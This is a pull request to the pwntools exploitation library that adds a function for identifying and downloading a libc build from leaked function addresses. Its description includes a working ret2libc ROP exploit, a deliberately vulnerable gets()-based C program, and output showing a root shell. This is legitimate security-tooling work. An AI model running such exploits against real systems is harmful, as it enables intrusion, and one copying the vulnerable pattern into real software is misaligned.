### PR TITLE
Add search for libc binary by leaked function addresses

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -69,10 +69,12 @@ The table below shows which release corresponds to each branch, and what date th
 - [#2062][2062] make pwn cyclic -l work with entry larger than 4 bytes
 - [#2092][2092] shellcraft: dup() is now called dupio() consistently across all supported arches
 - [#2093][2093] setresuid() in shellcraft uses current euid by default
+- [#2103][2103] Add search for libc binary by leaked function addresses `libcdb.search_by_symbol_offsets()`
 
 [2062]: https://github.com/Gallopsled/pwntools/pull/2062
 [2092]: https://github.com/Gallopsled/pwntools/pull/2092
 [2093]: https://github.com/Gallopsled/pwntools/pull/2093
+[2103]: https://github.com/Gallopsled/pwntools/pull/2103
 
 ## 4.9.0 (`beta`)
 

--- a/pwnlib/libcdb.py
+++ b/pwnlib/libcdb.py
@@ -247,6 +247,98 @@ def unstrip_libc(filename):
 
     return True
 
+def _handle_multiple_matching_libcs(matching_libcs):
+    from pwnlib.term import text
+    from pwnlib.ui import options
+    log.info('Multiple matching libc libraries for requested symbols:')
+    for idx, libc in enumerate(matching_libcs):
+        log.info('%d. %s', idx+1, text.red(libc['id']))
+        log.indented('\t%-20s %s', text.green('BuildID:'), libc['buildid'])
+        log.indented('\t%-20s %s', text.green('MD5:'), libc['md5'])
+        log.indented('\t%-20s %s', text.green('SHA1:'), libc['sha1'])
+        log.indented('\t%-20s %s', text.green('SHA256:'), libc['sha256'])
+        log.indented('\t%s', text.green('Symbols:'))
+        for symbol, address in libc['symbols'].items():
+            log.indented('\t%25s = %s', symbol, address)
+
+    selected_index = options("Select the libc version to use:", [libc['id'] for libc in matching_libcs])
+    return matching_libcs[selected_index]
+
+def search_by_symbol_offsets(symbols, select_index=None, unstrip=True, return_as_list=False):
+    """
+    Lookup possible matching libc versions based on leaked function addresses.
+
+    The leaked function addresses have to be provided as a dict mapping the
+    function name to the leaked value. Only the lower 3 nibbles are relevant
+    for the lookup.
+
+    If there are multiple matches you are presented with a list to select one
+    interactively, unless the ``select_index`` or ``return_as_list`` arguments
+    are used.
+
+    Arguments:
+        symbols(dict):
+            Dictionary mapping symbol names to their addresses.
+        select_index(int):
+            The libc to select if there are multiple matches (starting at 1).
+        unstrip(bool):
+            Try to fetch debug info for the libc and apply it to the downloaded file.
+        return_as_list(bool):
+            Return a list of build ids of all matching libc versions
+            instead of a path to a downloaded file.
+
+    Returns:
+        Path to the downloaded library on disk, or :const:`None`.
+        If the ``return_as_list`` argument is :const:`True`, a list of build ids
+        is returned instead.
+
+    Examples:
+        >>> filename = search_by_symbol_offsets({'puts': 0x420, 'printf': 0xc90}, select_index=1)
+        >>> libc = ELF(filename)
+        >>> libc.sym.system == 0x52290
+        True
+        >>> matched_libcs = search_by_symbol_offsets({'__libc_start_main_ret': '7f89ad926550'}, return_as_list=True)
+        >>> len(matched_libcs) > 1
+        True
+        >>> for buildid in matched_libcs: # doctest +SKIP
+        ...     libc = ELF(search_by_build_id(buildid)) # doctest +SKIP
+    """
+    import requests
+    for symbol, address in symbols.items():
+        if isinstance(address, int):
+            symbols[symbol] = hex(address)
+    try:
+        params = {'symbols': symbols}
+        url    = "https://libc.rip/api/find"
+        log.debug('Request: %s', params)
+        result = requests.post(url, json=params, timeout=20)
+        result.raise_for_status()
+
+        matching_libcs = result.json()
+        log.debug('Result: %s', matching_libcs)
+        if len(matching_libcs) == 0:
+            log.warn_once("No matching libc for symbols %r on libc.rip", symbols)
+            return None
+
+        if return_as_list:
+            return [libc['buildid'] for libc in matching_libcs]
+
+        if len(matching_libcs) == 1:
+            return search_by_build_id(matching_libcs[0]['buildid'], unstrip=unstrip)
+
+        if select_index is not None:
+            if select_index > 0 and select_index < len(matching_libcs):
+                return search_by_build_id(matching_libcs[select_index - 1]['buildid'], unstrip=unstrip)
+            else:
+                log.error('Invalid selected libc index. %d is not in the range of 1-%d.', select_index, len(matching_libcs))
+                return None
+
+        selected_libc = _handle_multiple_matching_libcs(matching_libcs)
+        return search_by_build_id(selected_libc['buildid'], unstrip=unstrip)
+    except requests.RequestException as e:
+        log.warn_once("Failed to lookup libc for symbols %r from libc.rip: %s", symbols, e)
+        return None
+
 def search_by_build_id(hex_encoded_id, unstrip=True):
     """
     Given a hex-encoded Build ID, attempt to download a matching libc from libcdb.
@@ -403,4 +495,4 @@ def get_build_id_offsets():
     }.get(context.arch, [])
 
 
-__all__ = ['get_build_id_offsets', 'search_by_build_id', 'search_by_sha1', 'search_by_sha256', 'search_by_md5', 'unstrip_libc']
+__all__ = ['get_build_id_offsets', 'search_by_build_id', 'search_by_sha1', 'search_by_sha256', 'search_by_md5', 'unstrip_libc', 'search_by_symbol_offsets']

--- a/pwnlib/libcdb.py
+++ b/pwnlib/libcdb.py
@@ -72,11 +72,11 @@ def provider_libc_rip(hex_encoded_id, hash_type):
     try:
         result = requests.post(url, json=params, timeout=20)
         result.raise_for_status()
-        if len(result.json()) == 0:
+        libc_match = result.json()
+        if not libc_match:
             log.warn_once("Could not find libc for %s %s on libc.rip", hash_type, hex_encoded_id)
             return None
 
-        libc_match = result.json()
         if len(libc_match) > 1:
             log.debug("Received multiple matches. Choosing the first match and discarding the others.")
             log.debug("%r", libc_match)

--- a/pwnlib/libcdb.py
+++ b/pwnlib/libcdb.py
@@ -329,7 +329,7 @@ def search_by_symbol_offsets(symbols, select_index=None, unstrip=True, return_as
             return search_by_build_id(matching_libcs[0]['buildid'], unstrip=unstrip)
 
         if select_index is not None:
-            if select_index > 0 and select_index < len(matching_libcs):
+            if select_index > 0 and select_index <= len(matching_libcs):
                 return search_by_build_id(matching_libcs[select_index - 1]['buildid'], unstrip=unstrip)
             else:
                 log.error('Invalid selected libc index. %d is not in the range of 1-%d.', select_index, len(matching_libcs))

--- a/pwnlib/libcdb.py
+++ b/pwnlib/libcdb.py
@@ -71,13 +71,15 @@ def provider_libc_rip(hex_encoded_id, hash_type):
     data = b""
     try:
         result = requests.post(url, json=params, timeout=20)
-        if result.status_code != 200 or len(result.json()) == 0:
+        result.raise_for_status()
+        if len(result.json()) == 0:
             log.warn_once("Could not find libc for %s %s on libc.rip", hash_type, hex_encoded_id)
-            log.debug("Error: %s", result.text)
             return None
 
         libc_match = result.json()
-        assert len(libc_match) == 1, 'Invalid libc.rip response.'
+        if len(libc_match) > 1:
+            log.debug("Received multiple matches. Choosing the first match and discarding the others.")
+            log.debug("%r", libc_match)
 
         url = libc_match[0]['download_url']
         log.debug("Downloading data from libc.rip: %s", url)


### PR DESCRIPTION
When you're able to leak addresses of the libc library, use `libcdb.search_by_symbol_offsets()` to find and download the matching libc library from https://libc.rip/.

If there are multiple matches, the user is prompted to select one interactively. The selection can be saved in the code for future executions of the script.

```python
from pwn import *

exe = context.binary = ELF('./vuln')

io = process('./vuln')
puts_leak = int(io.recvline(), 0)
printf_leak = int(io.recvline(), 0)

libc = ELF(libcdb.search_by_symbol_offsets({'puts': puts_leak, 'printf': printf_leak}))
libc.address = puts_leak - libc.sym.puts

rop = ROP(libc)
rop.call(rop.ret)
rop.system(next(libc.search(b'/bin/sh\x00')))

io.sendline(flat({0x28: rop.chain()}))
io.interactive()
```

```c
// gcc -fno-stack-protector -o vuln vuln.c
#include <stdio.h>

int main(int argc, char* argv[]) {
    char buf[0x20];
    printf("%p\n%p\n", puts, printf);
    gets(buf);
    return 0;
}
```

```
$ python expl.py
[*] 'vuln'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './vuln': pid 1894
[*] Multiple matching libc libraries for requested symbols:
[*] 1. libc6_2.31-0ubuntu9.8_amd64
        BuildID:     c9d56de82ddd00d822d6100034f3075ef1709cd2
        MD5:         993088888bcc0bf78d74e1e8ca0d33a6
        SHA1:        957a705e586fcefc6a3330b78a66d070a00d72ec
        SHA256:      e29f30c7204d46c55fb1ac1323707cae0884a189b82a24a144861c1e6220da6d
        Symbols:
            __libc_start_main_ret = 0x24083
                             dup2 = 0x10e8c0
                           printf = 0x61c90
                             puts = 0x84420
                             read = 0x10dfc0
                       str_bin_sh = 0x1b45bd
                           system = 0x52290
                            write = 0x10e060
[*] 2. libc6_2.31-0ubuntu9.9_amd64
        BuildID:     1878e6b475720c7c51969e69ab2d276fae6d1dee
        MD5:         5898fac5d2680d0d8fefdadd632b7188
        SHA1:        1430c57bf7ca6bd7f84a11c2cb7580fc39da07f5
        SHA256:      80378c2017456829f32645e6a8f33b4c40c8efa87db7e8c931a229afa7bf6712
        Symbols:
            __libc_start_main_ret = 0x24083
                             dup2 = 0x10e8c0
                           printf = 0x61c90
                             puts = 0x84420
                             read = 0x10dfc0
                       str_bin_sh = 0x1b45bd
                           system = 0x52290
                            write = 0x10e060
 [?] Select the libc version to use:
       1) libc6_2.31-0ubuntu9.8_amd64
    2> 2) libc6_2.31-0ubuntu9.9_amd64
[-] Downloading 'https://gitlab.com/libcdb/libcdb/raw/master/hashes/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee': Got code 404
[!] Could not fetch libc for build_id 1878e6b475720c7c51969e69ab2d276fae6d1dee from libcdb
[+] Downloading 'https://libc.rip/download/libc6_2.31-0ubuntu9.9_amd64.so': 1.94MB
[+] Downloading 'https://debuginfod.systemtap.org/buildid/1878e6b475720c7c51969e69ab2d276fae6d1dee/debuginfo': 5.19MB
[+] Starting local process '/usr/bin/eu-unstrip': pid 1899
[+] Receiving all data: Done (0B)
[*] Process '/usr/bin/eu-unstrip' stopped with exit code 0 (pid 1899)
[*] '/root/.cache/.pwntools-cache-3.8/libcdb/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Loaded 196 cached gadgets for '/root/.cache/.pwntools-cache-3.8/libcdb/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee'
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$
[*] Stopped process './vuln' (pid 1894)
```

Fixes #1867